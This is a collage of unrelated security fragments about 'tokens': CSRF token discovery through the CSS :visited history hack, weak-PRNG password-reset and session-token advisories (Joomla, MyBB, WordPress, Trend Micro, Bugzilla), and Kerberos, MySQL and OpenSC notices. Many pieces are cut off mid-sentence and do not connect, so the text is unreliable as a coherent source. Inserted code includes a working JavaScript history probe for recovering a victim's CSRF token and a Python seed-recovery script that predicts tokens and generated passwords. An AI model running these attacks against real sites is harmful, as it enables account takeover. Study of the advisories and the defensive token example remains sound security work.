tokens
I was thinking about the problem of Cross-Site Request Forgery and the mitigation strategies currently used in the industry. In many of the real-world applications I have tested so far, I see random tokens appended as part of the URL. If a request fails to provide a token, or provides a token with an incorrect value, the request is rejected. This prevents CSRF and any other cross-domain unauthorized function execution.
Until now, it was considered infeasible for an attacker to discover your CSRF token by brute-forcing it against the server.
The reasons being:
1. It generates a lot of noise on the network and is slow, so an IDS or web application firewall will most probably pick up the malicious behaviour and block your IP. For example, a base16 (hexadecimal) CSRF token of length 5 characters whose first character is a letter (a-f) has 6 * 16^4 = 393,216 possible values, so exhausting it takes approximately 393,216 requests.
2. Many applications are programmed to invalidate your session once they detect more than a certain number of requests (e.g. 30) with invalid token values.
I am going to change this belief by showing you a technique to quickly find CSRF tokens without generating alerts. It is a client-side attack, so there is almost no network traffic generated and hence the server and its IDS/web application firewall won't notice it at all. The attack is based on the well-known CSS History Hack found by Jeremiah Grossman three years ago.
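As an added illustration of the mechanism described above (this is not code from the post; the target URL https://target.example/transfer?csrf= and the 5-character hexadecimal token format are assumptions): the probe page is nothing more than one link per candidate token with a distinct :visited style, and the script reads the computed colour back to see which candidate URL the victim's browser already has in its history. Note that Firefox 4 and Chrome have returned the unvisited style from getComputedStyle for :visited links since 2010, so the readback step only works in browsers older than that; the keyspace calculation and page generation run anywhere, including Node.

```javascript
// Added example: CSS :visited history probing of a CSRF token carried in the URL.
// Not code from the original post. Target URL and token format are assumptions.
const HEX = '0123456789abcdef';
const LETTERS = 'abcdef';

// Number of candidates: for length 5 with a letter first, 6 * 16^4 = 393,216.
function keyspaceSize(length, firstIsLetter) {
  const first = firstIsLetter ? LETTERS.length : HEX.length;
  return first * Math.pow(HEX.length, length - 1);
}

// Enumerate every candidate token lazily; i is decoded as one "first" digit
// followed by (length - 1) hex digits, so the whole keyspace is covered once.
function* candidateTokens(length, firstIsLetter) {
  const firstSet = firstIsLetter ? LETTERS : HEX;
  const total = keyspaceSize(length, firstIsLetter);
  for (let i = 0; i < total; i++) {
    let n = i;
    let tail = '';
    for (let pos = 1; pos < length; pos++) {
      tail = HEX[n % 16] + tail;
      n = Math.floor(n / 16);
    }
    yield firstSet[n] + tail;
  }
}

// The probe page: unvisited links are black, visited ones red. No request is
// ever sent to the target; the browser's history answers for it.
function buildProbeHtml(baseUrl, length, firstIsLetter) {
  let html = '<style>a{color:#000} a:visited{color:#f00}</style>\n';
  for (const t of candidateTokens(length, firstIsLetter)) {
    html += `<a href="${baseUrl}${t}">${t}</a>\n`;
  }
  return html;
}

// In the browser: read the computed colour of each link; a red one means the
// victim has already loaded that exact URL, i.e. with that token value.
// doc and win are passed in so the function can be driven by stubs off-line.
function findVisitedTokens(doc, win, baseUrl) {
  const hits = [];
  for (const a of doc.querySelectorAll('a')) {
    const color = win.getComputedStyle(a).color;
    if (color === 'rgb(255, 0, 0)' || color === '#f00') {
      hits.push(a.getAttribute('href').slice(baseUrl.length));
    }
  }
  return hits;
}

// Stand-alone run: size of the search and the first few lines of the probe page.
console.log('candidates:', keyspaceSize(5, true));
console.log(buildProbeHtml('https://target.example/transfer?csrf=', 5, true).split('\n').slice(0, 4).join('\n'));
```

Whether the readback works is a property of the victim's browser, not of the target application; the application-side lesson is that a token that is ever part of a GET URL ends up in history, logs and Referer headers, and a second-generation probe like this one only needs one of those channels.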
could thus not only read sensitive information (SAM database for
example), but also write arbitrary content (disable passwords for
certain accounts, add new Administrator group users, etc.).
--- 7. Issue: Local DoS/privilege escalation by dereferencing invalid
pointer(s) used as parameter(s) for SetVistaTokenInformation() method
---
SABKUTIL.sys and SASKUTIL.sys use IOCTL code 0x9c4020c0
(IOCTL_SABKUTIL_SET_VISTA_TOKEN_INFORMATION) for writing arbitrary
information to the token of the current process.
return $this->trigger("cannot redefine built-in function '$matches[1]()'");
}
$args = explode(",", preg_replace("/\s+/", "", $matches[2])); // get the arguments
if (($stack = $this->nfx($matches[3])) === false) return false; // see if it can be converted to postfix
for ($i = 0; $i<count($stack); $i++) { // freeze the state of the non-argument variables
$token = $stack[$i];
if (preg_match('/^[a-z]\w*$/', $token) and !in_array($token, $args)) {
if (array_key_exists($token, $this->v)) {
$stack[$i] = $this->v[$token];
} else {
return $this->trigger("undefined variable '$token' in function definition");
can send a malformed UDP packet from any source IP address; they need not know
a valid game server's IP address to exploit this buffer overflow vulnerability.
When the client receives a UDP packet on port 27901 that specifies a server's
description (the server-to-client "print" message), it calls the function
M_AddToServerList(...)in \client\menu.c to tokenize the rest of the UDP packet
(status_string):
| void M_AddToServerList (netadr_t adr, char *status_string)
| {
| char *rLine;
www.sektioneins.de
-= Security Advisory =-
Advisory: Joomla Weak Random Password Reset Token Vulnerability
Release Date: 2008/09/11
Last Modified: 2008/09/11
Author: Stefan Esser [stefan.esser[at]sektioneins.de]
Application: Joomla <= 1.5.7
IMPACT
======
CVE-2010-1324
An unauthenticated remote attacker can forge GSS tokens that are
intended to be integrity-protected but unencrypted, if the targeted
pre-existing application session uses a DES session key.
An authenticated remote attacker can forge PACs if using a KDC that
does not filter client-provided PAC data. This can result in
discovered that this vulnerability can be used to reset the passwords
of users to a random string when user registration is activated
in the blog.
In addition to this it was discovered that Wordpress uses mt_rand()
to create passwords and reset tokens, which is not secure enough
for cryptographic secrets. The use of mt_rand() allows predicting
the randomly generated passwords when the PRNG is freshly seeded
and output of the PRNG is leaked to the user.
Combined this means on servers reusing PHP processes for multiple
Hey guys,
I recently got round to writing the whitepaper version of my Defcon 15 and CCC talk. For those who are interested, please find the abstract, PDF link and sourceforge link to the accompanying tool below: -
http://www.mwrinfosecurity.com/publications/mwri_security-implications-of-windows-access-tokens_2008-04-14.pdf
http://sourceforge.net/projects/incognito
ABSTRACT
This whitepaper discusses the security exposures that can occur due to the manner in which access tokens are implemented in the Microsoft® Windows Operating System. A brief overview of the intended function, design and implementation of Windows access tokens is given, followed by a discussion of the relevant security consequences of their design. More specific technical details are then given on how the features of Windows access tokens can be used to perform powerful post-exploitation functions during penetration testing, along with a basic methodology for including an assessment of the vulnerabilities exposed through tokens in a standard penetration test. Discussion is also included about why many corporate environments (assessed during penetration tests conducted by MWR InfoSecurity) have been found to not be operating in a manner which limits the risk of such issues. Finally, best practice advice is given on how to defend against these attacks.
Last Modified: 2010/04/13
Author: Stefan Esser [stefan.esser[at]sektioneins.de]
Application: MyBB <= 1.4.11
Severity: Usage of weak random number generation in password reset
functionality allows predicting the password reset token
and the randomly generated password, which results in
account takeover.
Risk: Critical
Vendor Status: MyBB 1.4.12 was released which partly fixes this
vulnerability
See http://www.owasp.org/index.php/Cross-Site_Request_Forgery for more details.
Good info @ http://www.cgisecurity.com/articles/csrf-faq.shtml as well:
"The most popular suggestion to preventing CSRF involves appending challenge tokens to each request. It is important to state that this challenge token MUST be associated with the user session, otherwise an attacker may be able to fetch a valid token on their own and utilize it in an attack. In addition to being tied to the user session it is important to limit the time period to which a token is valid. This method is documented in multiple documents however as pointed out in mailing list postings an attacker can utilize an existing browser vulnerability or XSS flaw to grab this session token."
The fact is, as long as one of these situations is available, the exploit can be auto-pwn:
1) The tab is open somewhere on the browser.
2) The session is still active in the browser.
+------------------------------------------------------------------------+
| Discussion | A lot of time was spent trying to come up with a way to |
| | resolve this issue in a way that was completely backwards |
| | compatible. However, the final resolution ended up |
| | requiring a modification to the IAX2 protocol. This |
| | modification is referred to as call token validation. |
| | Call token validation is used as a handshake before call |
| | numbers are assigned to IAX2 connections. |
| | |
| | Call token validation by itself does not resolve the |
| | issue. However, it does allow an IAX2 server to validate |
Summary:
A) Reflected XSS
B) Password field with autocomplete enabled
C) Disclosure of Session Tokens in URL
A) Reflected XSS
The presence of the Cross Site Scripting plague has been verified on
This alone isn't enough, since forms can be auto-submitted by JavaScript
irrespective of the same-origin policy.
Proper remediation should include Referer checking (which has proved to be
spoofable on the client side in the past, so it is not a bulletproof
technique) and token checking: a random string or a hash generated when
the user requests the frontend, stored server-side (sessions are fine),
included in the frontend form, and sent to and verified by the backend.
These two protections ensure that an action cannot, hopefully, be
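An added example (not the advisory's code, nor the cgisecurity FAQ's) of the token checking described here and in the FAQ quote earlier on this page: a token bound to the server-side session and limited in validity time, so that a token the attacker obtains from their own session, or one that has expired, is rejected. The names new_session, issue_token, verify_token and handle_post, and the 15-minute lifetime, are assumptions.

```python
# Added example, not code from the advisory or the FAQ it is placed after.
# Session-bound, time-limited CSRF token: an HMAC over (issue time, session id)
# under a per-session secret, so the server keeps one key per session instead
# of a table of every token it ever issued. All names are hypothetical.
import hashlib
import hmac
import secrets
import time

TOKEN_TTL = 15 * 60  # assumption: a token is valid for 15 minutes

def new_session():
    """Server-side session record. csrf_key never leaves the server."""
    return {"id": secrets.token_hex(16), "csrf_key": secrets.token_bytes(32)}

def issue_token(session, now=None):
    """token = issued_at '.' HMAC-SHA256(csrf_key, issued_at ':' session id)."""
    issued_at = int(now if now is not None else time.time())
    msg = f"{issued_at}:{session['id']}".encode()
    mac = hmac.new(session["csrf_key"], msg, hashlib.sha256).hexdigest()
    return f"{issued_at}.{mac}"

def verify_token(session, token, now=None):
    """True only if the token was minted for this session and has not expired."""
    now = int(now if now is not None else time.time())
    try:
        issued_str, mac = token.split(".", 1)
        issued_at = int(issued_str)
    except (ValueError, AttributeError):
        return False
    if issued_at > now or now - issued_at > TOKEN_TTL:
        return False
    msg = f"{issued_at}:{session['id']}".encode()
    expected = hmac.new(session["csrf_key"], msg, hashlib.sha256).hexdigest()
    # constant-time comparison: a byte-by-byte timing leak would undo the MAC
    return hmac.compare_digest(expected, mac)

def handle_post(session, form, now=None):
    """Hypothetical state-changing endpoint: check the token before acting."""
    if not verify_token(session, form.get("csrf_token", ""), now=now):
        return 403, "CSRF token missing, expired or not issued for this session"
    return 200, "action performed"

if __name__ == "__main__":
    victim, attacker = new_session(), new_session()
    t0 = 1_700_000_000
    tok = issue_token(victim, now=t0)
    print(handle_post(victim, {"csrf_token": tok}, now=t0 + 60))             # 200
    print(handle_post(victim, {}, now=t0 + 60))                              # 403, missing
    print(handle_post(victim, {"csrf_token": issue_token(attacker, now=t0)}, now=t0 + 60))  # 403, attacker's own token
    print(handle_post(victim, {"csrf_token": tok}, now=t0 + TOKEN_TTL + 1))  # 403, expired
```

The third case is the one the FAQ warns about: the attacker can always fetch a perfectly valid token for their own session, and only the binding to the victim's session makes that useless. The token still belongs in a form field or request header rather than the URL, for the reasons that recur throughout this page (logs, Referer, browser history).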
Information Leakage, Directory Traversal, Arbitrary File Deletion and Denial
of Service vulnerabilities in WordPress.
To exploit any of these it is necessary to have access to an admin account, or
to an account with rights to work with plugins, or to attack the admin or
another user with the required rights via XSS in order to obtain the token
designed to protect against CSRF attacks.
So users of WordPress don't need to worry much about these holes (provided the
above-mentioned requirements are not met). But these vulnerabilities will be
useful to security researchers with access to the admin panel or in the presence of
Secunia Research has discovered a vulnerability in certain Trend Micro
products, which can be exploited by malicious people to bypass
authentication.
The vulnerability is caused by insufficient entropy being used to
create a random session token for identifying an authenticated
manager using the web management console. The entropy in the session
token comes solely from the system time when the real manager logs in
with a granularity of one second. This can be exploited to
impersonate a currently logged on manager by brute forcing the
authentication token.
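An added example (hypothetical code, not Trend Micro's, MyBB's or WordPress's) of what a token whose entropy comes solely from a one-second login time, or from a freshly seeded mt_rand() whose output leaks, gives an attacker: the seed space is small enough to try every candidate offline, and once the seed is known every other value drawn from that PRNG (a reset token, a generated password) follows. The function names, the SHA-1 derivation and the six-hour search window are assumptions.

```python
# Added example, not vendor code. Models the two weaknesses described on this
# page: a session token whose only entropy is the login second, and a PRNG that
# is freshly seeded and then used for both a leaked value and a secret one.
import hashlib
import random
import secrets
import time

def weak_session(login_second):
    """Vulnerable pattern: a 1-second timestamp is the only entropy.

    CPython's random.Random is MT19937, the generator behind PHP's mt_rand();
    seeding it with the login second leaves only 86,400 seeds per day.
    """
    rng = random.Random(login_second)
    session_token = hashlib.sha1(str(rng.getrandbits(64)).encode()).hexdigest()
    reset_password = "%08x" % rng.getrandbits(32)  # next output of the same PRNG
    return session_token, reset_password

def recover_seed(observed_token, window_start, window_seconds):
    """Try every second in the window until one reproduces the observed token."""
    for sec in range(window_start, window_start + window_seconds):
        if weak_session(sec)[0] == observed_token:
            return sec
    return None

def predict_password(observed_token, window_start, window_seconds):
    """With the seed known, the password drawn from the same PRNG is known too."""
    seed = recover_seed(observed_token, window_start, window_seconds)
    return None if seed is None else weak_session(seed)[1]

def strong_token():
    """Fix: take the token from the OS CSPRNG; 256 bits, nothing to brute-force."""
    return secrets.token_hex(32)

if __name__ == "__main__":
    # Constructed scenario: the real manager logged in 2h17s ago; the attacker has
    # seen that session token (URL, log, Referer...) and knows roughly when.
    now = int(time.time())
    login = now - 2 * 3600 - 17
    token_seen, real_password = weak_session(login)
    window = (now - 6 * 3600, 6 * 3600 + 1)
    print("seed recovered:", recover_seed(token_seen, *window) == login)
    print("password predicted:", predict_password(token_seen, *window) == real_password)
    print("strong token:", strong_token())
```

The search is 21,601 hash computations for a six-hour window, well under a second; against a real application the observed value may be the attacker's own token rather than the victim's, which is exactly the "output of the PRNG is leaked to the user" condition in the MyBB and WordPress advisories.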
> do have use beyond surfing adult-content).
>
>
> > To tell you the truth,
> > the original motivation was just that it's not a
> > good idea to have a valid authentication token
> > (the file retrieval session ID) embedded in a URL.
>
> Sure, it can show up in logs, referer, etc. If
> you don't mind JavaScript, it's easy enough to
> use JavaScript to submit a POST.
With this bug anyone can change a user PIN without having the PIN or PUK
or the superusers PIN or PUK. However it can not be used to figure out the
PIN. If the PIN on your card is still the same you always had, there's a
reasonable chance that this vulnerability has not been exploited.
This vulnerability affects only smart cards and USB crypto tokens based on
Siemens CardOS M4, and within that group only those that were initialised
with OpenSC. Users of other smart cards and USB crypto tokens, or cards
that have been initialised with some software other than OpenSC, are not
affected.
Problem Description:
Multiple vulnerabilities have been found and corrected in mysql:
MySQL 5.0 before 5.0.66, 5.1 before 5.1.26, and 6.0 before 6.0.6
does not properly handle a b'' (b single-quote single-quote) token,
aka an empty bit-string literal, which allows remote attackers to
cause a denial of service (daemon crash) by using this token in a
SQL statement (CVE-2008-3963).
MySQL 5.0.51a allows local users to bypass certain privilege checks by
having the PIN or PUK, or the superuser's PIN or PUK (CVE-2008-2235).
Please note that this issue can not be used to discover the PIN on
a card. If the PIN on a card is the same that was always there,
it is unlikely that this vulnerability has been exploited. As well,
this issue only affects smart cards and USB crypto tokens based on
Siemens CardOS M4, and then only those devices that were initialized
by OpenSC. Users of other smart cards or USB crypto tokens, or cards
that were not initialized by OpenSC, are not affected.
After applying the update, executing 'pkcs15-tool -T' will indicate
Report Confidence: Confirmed
SUMMARY
=======
Certain invalid GSS-API tokens can cause a GSS-API acceptor (server)
to crash due to a null pointer dereference in the GSS-API library.
This is an implementation vulnerability in MIT krb5, and not a
vulnerability in the Kerberos protocol.
An unauthenticated remote attacker could alter a SAM-2 challenge,
affecting the prompt text seen by the user or the kind of response
sent to the KDC. Under some circumstances, this can negate the
incremental security benefit of using a single-use authentication
mechanism token. An unauthenticated remote attacker has a 1/256
chance of forging KRB-SAFE messages in an application protocol if the
targeted pre-existing session uses an RC4 session key. Few application
protocols use KRB-SAFE messages (CVE-2010-1323).
An unauthenticated remote attacker can forge GSS tokens that
MySQL before 5.0.67 allows local users to bypass certain privilege
you're right, the file is likely to be in the
stolen laptop. If the browser displayed the file
and the user takes no precautions, the file should
be in the browser's cache. To tell you the truth,
the original motivation was just that it's not a
good idea to have a valid authentication token
(the file retrieval session ID) embedded in a URL.
The stolen laptop scenario was an afterthought.
(There is also a more exotic scenario: the
attacker reads the authentication token from the
user's computer display, as it is shown in the
Bugzilla is a Web-based bug-tracking system, used by a large number of
software projects.
Bugzilla 3.2.1, 3.0.7, and 3.3.2, when running under mod_perl,
generated insufficiently random numbers, resulting in all random
tokens being the same, all CSRF protection being defeated, and the
new attachment_base functionality being compromised. Only these
releases were affected--earlier releases are not affected.
All affected installations are encouraged to upgrade as soon as
possible.
/?m=Profile&func=get_raw_blog_entry&user_id=<user_id>&ajax=1&store=0&ajax_target=none
HTTP/1.1
Host: wwwb21.tuenti.com
...
blog_entry_id=<blog_entry_id>&csfr=<token>
where:
- <user_id> = id of the authenticated user
- <blog_entry_id> = id of the blog entry requested by the
authenticated user
http://www.debian.org/security/ Luciano Bello
August 12, 2010 http://www.debian.org/security/faq
- ------------------------------------------------------------------------
Package : squirrelmail
Vulnerability : No user-specific token implemented
Problem type : remote
Debian-specific: no
Debian bug : 543818
CVE ID : CVE-2009-2964 CVE-2010-2813
1) An unsafe call to "sscanf()" when parsing the "ENCODING" attribute
of the "*BEGIN" tag can be exploited to cause a stack-based buffer
overflow.
2) A boundary error when parsing overly long tokens from the input
file can be exploited to cause a heap-based buffer overflow.
3) A boundary error when parsing the initial "*BEGIN" tag can be
exploited to cause stack-based buffer overflow.
---
[*] Cross-Site Request Forgery (CSRF):
All the forms on the admin panel are vulnerable to CSRF because of the lack of security tokens to
check whether the administrator really intends those actions. Without a token an attacker can create
a new user as admin or change the administrator's password and other personal data. Another kind of
action can be triggered with a simple BBCode [img] tag: when the administrator views the [img] tag with a
specially crafted URL, an action such as deleting a topic could be executed.
A more dangerous attack can lead to JavaScript execution.
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
TSRM/tsrm_virtual_cwd.c-619: tok=NULL;
TSRM/tsrm_virtual_cwd.c-620: ptr = tsrm_strtok_r(path_copy,
TOKENIZER_STRING, &tok);
TSRM/tsrm_virtual_cwd.c-621: while (ptr) {
TSRM/tsrm_virtual_cwd.c-622: ptr_length = strlen(ptr);
[..]
TSRM/tsrm_virtual_cwd.c-624: if (IS_DIRECTORY_UP(ptr, ptr_length)) {
[..]